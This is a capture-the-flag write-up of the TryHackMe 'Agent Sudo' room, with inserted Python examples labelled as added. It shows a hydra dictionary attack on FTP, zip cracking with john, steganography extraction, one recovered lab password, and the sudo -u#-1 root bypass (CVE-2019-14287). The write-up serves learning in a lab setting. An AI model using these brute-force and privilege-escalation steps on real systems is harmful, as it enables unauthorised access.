
Agent Sudo

Description:

The following post is a writeup of the Agent Sudo room on TryHackMe: https://tryhackme.com/room/agentsudoctf

Machine Details:

OS: Linux
Rating: Easy
Creator: DesKel

Summary:

A port scan finds three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP). The web page on port 80 tells agents to use their codename as the User-Agent; setting it to C lands on a secret page that names the user chris and says his password is weak. A User-Agent header is fully attacker-controlled, so it is trivially enumerated and here gives away both a username and a password hint. A dictionary attack against FTP recovers chris's password, and the FTP share holds a note and two images. One image has an encrypted zip appended to it; cracking it with john gives a base64-encoded passphrase that unlocks the data hidden in the fake picture, which contains the password of the user james. Finally, james's sudoers entry is (ALL, !root) /bin/bash on an unpatched sudo, so the -u#-1 bypass (CVE-2019-14287) gives a root shell.

Walkthrough:

Enumeration

Let's start with an nmap scan.

└──╼ $nmap -sC -sV -A -T4 10.10.144.201 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-02 10:22 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating Ping Scan at 10:22
Scanning 10.10.144.201 [2 ports]
Completed Ping Scan at 10:22, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:22
Completed Parallel DNS resolution of 1 host. at 10:22, 0.10s elapsed
Initiating Connect Scan at 10:22
Scanning 10.10.144.201 [1000 ports]
Discovered open port 21/tcp on 10.10.144.201
Discovered open port 80/tcp on 10.10.144.201
Discovered open port 22/tcp on 10.10.144.201
Increasing send delay for 10.10.144.201 from 0 to 5 due to 47 out of 117 dropped probes since last increase.
Completed Connect Scan at 10:22, 14.29s elapsed (1000 total ports)
Initiating Service scan at 10:22
Scanning 3 services on 10.10.144.201
Completed Service scan at 10:22, 6.46s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.144.201.
Initiating NSE at 10:22
Completed NSE at 10:22, 7.03s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.96s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Nmap scan report for 10.10.144.201
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Initiating NSE at 10:22
Completed NSE at 10:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.66 seconds

Let's start enumerating port 80. The announcement page reads:

Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R

Setting the User-Agent header to the codename C takes us to the secret page:

Secret Page

Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From,
Agent R
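The gating described above, as an added example that is not from the original post: a small Python HTTP server that stands in for the announcement page and redirects only when the User-Agent equals a codename, and a probe that tries each single-letter codename without following redirects and reports which values get a redirect and where it points. The secret path, the 302 status and the response bodies are assumptions for this demo; the room's real path is not on this page.

```python
import string
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-in for the gated page. The path and the 302 are assumptions
# for the demo, not taken from the room.
CODENAME = "C"
SECRET_PATH = "/secret-page-for-agent-c"   # hypothetical
ANNOUNCEMENT = b"Dear agents,\nUse your own codename as user-agent to access the site.\n"
SECRET_BODY = b"Attention chris,\nchange your god damn password, is weak!\n"


class GatedHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Weak control: a request header chosen by the client is treated as identity.
        if self.path == "/" and self.headers.get("User-Agent") == CODENAME:
            self.send_response(302)
            self.send_header("Location", SECRET_PATH)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        body = SECRET_BODY if self.path == SECRET_PATH else ANNOUNCEMENT
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def probe_codenames(host, port, candidates=string.ascii_uppercase) -> dict:
    """One GET per candidate User-Agent, redirects NOT followed, so a 3xx with a
    Location header is visible as the signal that this codename is recognised."""
    hits = {}
    for ua in candidates:
        conn = HTTPConnection(host, port, timeout=5)
        try:
            conn.request("GET", "/", headers={"User-Agent": ua})
            resp = conn.getresponse()
            resp.read()
            location = resp.getheader("Location")
            if 300 <= resp.status < 400 and location:
                hits[ua] = location
        finally:
            conn.close()
    return hits


def demo() -> dict:
    """Start the constructed server on a free loopback port, probe A-Z, stop it."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), GatedHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        return probe_codenames("127.0.0.1", server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

Against a real target the same probe loop works with the host and port swapped in; the point of not following redirects is that the Location header, not the final page, is what distinguishes a recognised codename from the default announcement.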

So chris's password is weak; let's try a dictionary attack against SSH or FTP.

I tried both and got a hit on vsftpd.

└──╼ $hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.144.201
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-02 10:28:58
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.144.201:21/
[21][ftp] host: 10.10.144.201   login: chris   password: <redacted>
[STATUS] 14344399.00 tries/min, 14344399 tries in 00:01h, 1 to do in 00:01h, 15 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-02 10:30:02
Let's log in over FTP as chris and list the files:

-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png

cat To_agentJ.txt

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn’t be a problem for you.

From, Agent C

Another message. It tells agent J that his login password is hidden in one of the fake pictures, so let's check the images for steganography.

Binwalk

└──╼ $binwalk cutie.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22
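Carving the appended archive, as an added example that is not from the original post: a Python script that builds a constructed carrier (a valid 1x1 PNG with a zip appended after IEND, the same layout binwalk reported for cutie.png), finds where the PNG really ends by walking its chunks, locates the zip local-file-header signature after that point, and reports each entry's name, encryption flag and sizes, which is the information binwalk's description line summarised. The entry name and payload are made up for the demo; the password argument is only needed when the encryption flag is set, which in the room is where john comes in.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"   # the signature binwalk keys on for "Zip archive data"


def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_carrier(entry_name: str, payload: bytes) -> bytes:
    """Constructed sample: a valid 1x1 grayscale PNG with a ZIP appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, colour type 0
    idat = zlib.compress(b"\x00\x00")                       # filter byte + one pixel
    png = (PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat)
           + _png_chunk(b"IEND", b""))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, payload)
    return png + buf.getvalue()


def png_end_offset(data: bytes) -> int:
    """Walk the chunk list and return the offset just past IEND.
    Anything after this point is not part of the image a viewer renders."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4          # header + data + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("truncated PNG: no IEND chunk")


def find_zip_offsets(data: bytes) -> list:
    """Every offset of a ZIP local-file-header signature in the blob."""
    offsets, start = [], 0
    while (idx := data.find(ZIP_LOCAL_HEADER, start)) != -1:
        offsets.append(idx)
        start = idx + 1
    return offsets


def carve_zip(data: bytes):
    """Return (offset, entries) for the first ZIP that starts after IEND.
    General-purpose flag bit 0 set means the entry uses ZIP encryption."""
    end = png_end_offset(data)
    candidates = [o for o in find_zip_offsets(data) if o >= end]
    if not candidates:
        raise ValueError("no ZIP archive after IEND")
    offset = candidates[0]
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        entries = [{"name": zi.filename,
                    "encrypted": bool(zi.flag_bits & 0x1),
                    "compressed_size": zi.compress_size,
                    "uncompressed_size": zi.file_size}
                   for zi in zf.infolist()]
    return offset, entries


def extract_entry(data: bytes, offset: int, name: str, password=None) -> bytes:
    """Read one entry from the carved archive; password only matters when encrypted."""
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        return zf.read(name, pwd=password)


if __name__ == "__main__":
    sample = build_carrier("To_agentR.txt", b"Agent C, constructed payload for the demo.")
    off, found = carve_zip(sample)
    print(f"zip at offset {off} (0x{off:x}): {found}")
    print(extract_entry(sample, off, "To_agentR.txt"))
```

Saving `data[offset:]` to disk gives the same file that `binwalk -e` writes out; if the report shows the encrypted flag set, that carved file is what goes into zip2john before john.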

The archive embedded at offset 0x8702 is an encrypted zip holding To_agentR.txt. Carve it out (binwalk -e), convert it with zip2john and crack the password with john; the file inside reads:

Agent C,

We need to send the picture to ‘QXJ…..’ as soon as possible!

By, Agent R

Interesting. The quoted string uses only base64 alphabet characters (the QXJ prefix decodes to "Ar"), so let's decode it. I was pretty much stuck here, but after some thought I got it.

└──╼ $base64 -d rand.txt
<redacted>

Haha, it worked. The decoded string is a passphrase: using it to extract the data hidden in the remaining picture, cute-alien.jpg, gives message.txt:

Hi james,

Glad you find this message. Your login password is hackerrules!

Don’t ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy chris

For real, I was stuck a bit here and ran an exploit suggester, but got nothing. Then I felt like a noob when I ran this and it suddenly hit me:

james@agent-sudo:/tmp$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash

Yup, a sudo exploit. The rule lets james run /bin/bash as any user except root, but this sudo is older than 1.8.28 and vulnerable to CVE-2019-14287: passing the target user as -u#-1 gets past the !root check (uid -1 is not 0), and because setresuid() treats -1 as "leave unchanged", the shell keeps sudo's own uid 0.

james@agent-sudo:/tmp$ sudo -u#-1 /bin/bash
root@agent-sudo:/tmp#
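Why the bypass works, as an added example that is not from the post or from sudo's source: a constructed Python model of the runas check in sudo before 1.8.28 (CVE-2019-14287). The passwd map, the rule representation and the setresuid() emulation are simplifications made for this demo; the two facts it rests on are real: the !root exclusion compares the requested uid against 0, and the kernel treats a uid argument of -1 to setresuid() as "do not change".

```python
# Constructed model of sudo's runas handling around CVE-2019-14287.
# Not sudo's code: a simplification that keeps only the decision that mattered.

UID_T_MAX = 0xFFFFFFFF   # uid_t is unsigned 32-bit on Linux, so -1 == 4294967295
SUDO_EUID = 0            # sudo is setuid root, so the process asking the kernel is uid 0

# Constructed stand-in for getpwnam(); the ids are made up for the demo.
PASSWD = {"root": 0, "james": 1000, "chris": 1001}


def parse_runas_user(spec: str) -> int:
    """Resolve the -u argument: a user name via passwd, or '#<number>' taken literally.
    Before 1.8.28 sudo accepted '#-1' here and carried the -1 through."""
    if spec.startswith("#"):
        return int(spec[1:], 10)
    if spec not in PASSWD:
        raise KeyError(f"unknown user {spec}")
    return PASSWD[spec]


def runas_permitted(target_uid: int, excluded) -> bool:
    """The '(ALL, !root)' rule: every runas user is allowed unless its uid is excluded.
    A blacklist only blocks ids it can name; -1 is not 0, so it passes."""
    return target_uid not in excluded


def effective_uid_after_setresuid(requested: int) -> int:
    """Kernel semantics: setresuid(-1, ...) means 'leave this id unchanged'.
    Requested from a uid-0 process, the result is still uid 0."""
    if requested in (-1, UID_T_MAX):
        return SUDO_EUID
    return requested & UID_T_MAX


def run_sudo(spec: str, excluded=frozenset({0}), patched: bool = False):
    """Return the uid the command would run as, or None if sudo refuses.
    patched=True applies the 1.8.28 fix: -1 and 4294967295 are rejected as runas ids."""
    uid = parse_runas_user(spec)
    if patched and uid in (-1, UID_T_MAX):
        return None                       # refused before any privilege change
    if not runas_permitted(uid, excluded):
        return None                       # blocked by the !root exclusion
    return effective_uid_after_setresuid(uid)


if __name__ == "__main__":
    # Sudoers line on the box:  james ALL=(ALL, !root) /bin/bash
    print("sudo -u root /bin/bash          ->", run_sudo("root"))              # None
    print("sudo -u#-1 /bin/bash            ->", run_sudo("#-1"))               # 0
    print("sudo -u#4294967295 /bin/bash    ->", run_sudo("#4294967295"))       # 0
    print("patched: sudo -u#-1 /bin/bash   ->", run_sudo("#-1", patched=True)) # None
```

On a target, `sudo -V` shows the installed version; anything below 1.8.28 with a `!` runas exclusion is exposed this way. Beyond patching, the durable fix is in sudoers itself: grant the runas users you actually mean, as an allow-list, rather than ALL minus an exclusion; the sudoers(5) manual warns in the same terms about using `!` to subtract commands from ALL.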

Damn, good. Rooted. The root flag message reads:

To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.

Your flag is

By, a.k.a Agent R
This post is licensed under CC BY 4.0 by the author.